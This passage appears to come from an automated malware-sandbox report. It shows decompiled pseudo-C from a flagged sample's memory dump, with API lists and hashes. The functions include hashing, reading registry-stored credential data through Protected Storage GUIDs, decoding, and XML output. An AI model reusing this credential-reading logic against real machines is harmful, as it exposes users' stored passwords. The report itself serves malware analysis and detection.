				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                                        0x0040bd0b
                                                                        0x0040bd13
                                                                        0x0040bd14
                                                                        0x0040bd16
                                                                        0x0040bd1a
                                                                        0x0040bd1d
                                                                        0x0040bd1f
                                                                        0x0040bd23
                                                                        0x0040bd52
                                                                        0x0040bd25
                                                                        0x0040bd2a
                                                                        0x0040bd2f
                                                                        0x0040bd36
                                                                        0x0040bd40
                                                                        0x0040bd48
                                                                        0x0040bd5d
                                                                        0x0040bd63
                                                                        0x0040bd6b
                                                                        0x0040bd77
                                                                        0x0040bd89

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$memcpy
                                                                        • String ID:
                                                                        • API String ID: 368790112-0
                                                                        • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                        • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                        • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                        • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                                        0x0040247a
                                                                        0x0040247f
                                                                        0x00402481
                                                                        0x00402490
                                                                        0x0040249b
                                                                        0x004024a0
                                                                        0x004024a5
                                                                        0x004024b0
                                                                        0x004024b7
                                                                        0x004024be
                                                                        0x004024c5
                                                                        0x004024cc
                                                                        0x0040259e
                                                                        0x004025ad
                                                                        0x004025b5
                                                                        0x004025d1
                                                                        0x004025e4
                                                                        0x004025ee
                                                                        0x004025ee
                                                                        0x004025d1
                                                                        0x004024d2
                                                                        0x004024d8
                                                                        0x004024dd
                                                                        0x00402546
                                                                        0x004024df
                                                                        0x004024ed
                                                                        0x004024f5
                                                                        0x004024fa
                                                                        0x00402510
                                                                        0x00402517
                                                                        0x0040252c
                                                                        0x0040252c
                                                                        0x0040254b
                                                                        0x0040254b
                                                                        0x0040254d
                                                                        0x00402552
                                                                        0x00402575
                                                                        0x0040257d
                                                                        0x0040258f
                                                                        0x00402594
                                                                        0x0040257d
                                                                        0x00402552
                                                                        0x004024cc
                                                                        0x00402603

                                                                        APIs
                                                                          • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                        • memset.MSVCRT ref: 004024F5
                                                                          • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                          • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                          • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                          • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                        • LocalFree.KERNEL32(?), ref: 004025EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                        • String ID:
                                                                        • API String ID: 3503910906-0
                                                                        • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                        • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                        • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                        • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                                        0x0040a120
                                                                        0x0040a122
                                                                        0x0040a127
                                                                        0x0040a129
                                                                        0x0040a12c
                                                                        0x0040a12c
                                                                        0x0040a136
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040a138
                                                                        0x0040a13c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040a148
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040a14d
                                                                        0x0040a155
                                                                        0x0040a176
                                                                        0x0040a176
                                                                        0x0040a257
                                                                        0x0040a25c
                                                                        0x0040a25e
                                                                        0x0040a25e
                                                                        0x0040a26b
                                                                        0x0040a26e
                                                                        0x0040a274
                                                                        0x0040a27c
                                                                        0x0040a27c
                                                                        0x0040a17f
                                                                        0x0040a181
                                                                        0x0040a188
                                                                        0x0040a18b
                                                                        0x0040a18e
                                                                        0x0040a1f2
                                                                        0x0040a1f2
                                                                        0x0040a1f4
                                                                        0x0040a1fa
                                                                        0x0040a1fd
                                                                        0x0040a255
                                                                        0x00000000
                                                                        0x0040a256
                                                                        0x0040a1ff
                                                                        0x0040a1ff
                                                                        0x0040a201
                                                                        0x0040a21f
                                                                        0x0040a224
                                                                        0x0040a229
                                                                        0x0040a22f
                                                                        0x0040a235
                                                                        0x0040a23e
                                                                        0x00000000
                                                                        0x0040a23e
                                                                        0x0040a231
                                                                        0x0040a233
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040a241
                                                                        0x0040a241
                                                                        0x0040a247
                                                                        0x0040a24a
                                                                        0x0040a24d
                                                                        0x0040a24d
                                                                        0x00000000
                                                                        0x0040a201
                                                                        0x0040a190
                                                                        0x0040a190
                                                                        0x0040a192
                                                                        0x0040a198
                                                                        0x0040a19c
                                                                        0x0040a19f
                                                                        0x0040a1a0
                                                                        0x0040a1a5
                                                                        0x0040a1a8
                                                                        0x0040a1ae
                                                                        0x0040a1b2
                                                                        0x0040a1b3
                                                                        0x0040a1b8
                                                                        0x0040a1bb
                                                                        0x0040a1bf
                                                                        0x0040a1c5
                                                                        0x0040a1ce
                                                                        0x0040a1d1
                                                                        0x00000000
                                                                        0x0040a1d1
                                                                        0x0040a1c1
                                                                        0x0040a1c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040a1d8
                                                                        0x0040a1d8
                                                                        0x0040a1de
                                                                        0x0040a1e1
                                                                        0x0040a1e4
                                                                        0x0040a1e4
                                                                        0x0040a1ec
                                                                        0x0040a1f0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                          • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                        • strlen.MSVCRT ref: 0040A13F
                                                                        • atoi.MSVCRT ref: 0040A14D
                                                                        • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                        • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                        • String ID:
                                                                        • API String ID: 4107816708-0
                                                                        • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                        • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                        • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                        • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00410E8A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00410E8A(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x411004
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E00410E56(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E00410E56(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E00410E56(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E00410E56(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                                        0x00410e8a
                                                                        0x00410e92
                                                                        0x00410e95
                                                                        0x00410e9c
                                                                        0x00410ea0
                                                                        0x00410ea3
                                                                        0x00410f5b
                                                                        0x00410f5b
                                                                        0x00000000
                                                                        0x00410f5f
                                                                        0x00410ea9
                                                                        0x00410eb0
                                                                        0x00410eb3
                                                                        0x00410eb3
                                                                        0x00410eb6
                                                                        0x00410eb6
                                                                        0x00410eb6
                                                                        0x00410ebb
                                                                        0x00410ec8
                                                                        0x00410ebd
                                                                        0x00410ebd
                                                                        0x00410ebd
                                                                        0x00410ecb
                                                                        0x00410ecb
                                                                        0x00410ed0
                                                                        0x00410edd
                                                                        0x00410ed2
                                                                        0x00410ed2
                                                                        0x00410ed2
                                                                        0x00410ee0
                                                                        0x00410ee4
                                                                        0x00410eef
                                                                        0x00410ee6
                                                                        0x00410ee6
                                                                        0x00410ee6
                                                                        0x00410ef1
                                                                        0x00410ef6
                                                                        0x00410f03
                                                                        0x00410ef8
                                                                        0x00410ef8
                                                                        0x00410ef8
                                                                        0x00410f14
                                                                        0x00410f1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00410f29
                                                                        0x00410f31
                                                                        0x00410f6f
                                                                        0x00410f74
                                                                        0x00000000
                                                                        0x00410f74
                                                                        0x00410f39
                                                                        0x00410f3c
                                                                        0x00410f40
                                                                        0x00410f43
                                                                        0x00410f4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00410f4b
                                                                        0x00410f65
                                                                        0x00410f6a
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strlen
                                                                        • String ID: >$>$>
                                                                        • API String ID: 39653677-3911187716
                                                                        • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                        • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                        • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                        • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 50%
                                                                        			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                                        0x0040bc72
                                                                        0x0040bc74
                                                                        0x0040bc76
                                                                        0x0040bc79
                                                                        0x0040bc7f
                                                                        0x0040bc82
                                                                        0x0040bc84
                                                                        0x0040bc84
                                                                        0x0040bc8c
                                                                        0x0040bc92
                                                                        0x0040bc95
                                                                        0x0040bcc7
                                                                        0x0040bcca
                                                                        0x0040bcce
                                                                        0x0040bcd1
                                                                        0x0040bcda
                                                                        0x0040bcdf
                                                                        0x0040bce7
                                                                        0x0040bcec
                                                                        0x0040bcf0
                                                                        0x0040bcf3
                                                                        0x0040bcf3
                                                                        0x0040bcd1
                                                                        0x0040bcf6
                                                                        0x0040bcf7
                                                                        0x0040bcfd
                                                                        0x0040bc97
                                                                        0x0040bc99
                                                                        0x0040bc9a
                                                                        0x0040bc9e
                                                                        0x0040bca2
                                                                        0x0040bcb0
                                                                        0x0040bcb5
                                                                        0x0040bcbd
                                                                        0x0040bcc2
                                                                        0x0040bcc5
                                                                        0x00000000
                                                                        0x0040bca4
                                                                        0x0040bca4
                                                                        0x0040bca5
                                                                        0x0040bca8
                                                                        0x0040bca8
                                                                        0x0040bca2
                                                                        0x0040bd0a

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: @
                                                                        • API String ID: 3510742995-2766056989
                                                                        • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                        • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                        • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                        • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                                        0x0040a437
                                                                        0x0040a44c
                                                                        0x0040a44f
                                                                        0x0040a45d
                                                                        0x0040a46d
                                                                        0x0040a474
                                                                        0x0040a476
                                                                        0x0040a479
                                                                        0x0040a487
                                                                        0x0040a49a
                                                                        0x0040a49f
                                                                        0x0040a4aa
                                                                        0x00000000
                                                                        0x0040a4c0
                                                                        0x0040a4c7

                                                                        APIs
                                                                          • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                          • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                        • sprintf.MSVCRT ref: 0040A45D
                                                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                          • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                          • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                        • sprintf.MSVCRT ref: 0040A487
                                                                        • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 919693953-0
                                                                        • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                        • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                        • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                        • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}











                                                                        0x0040990e
                                                                        0x00409910
                                                                        0x00409917
                                                                        0x00409926
                                                                        0x0040992d
                                                                        0x00409939
                                                                        0x0040993d
                                                                        0x00409943
                                                                        0x00409957
                                                                        0x00409971

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00409917
                                                                        • memset.MSVCRT ref: 0040992D
                                                                          • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                          • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                        • sprintf.MSVCRT ref: 00409957
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                        • String ID: </%s>
                                                                        • API String ID: 3202206310-259020660
                                                                        • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                        • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                        • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                        • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
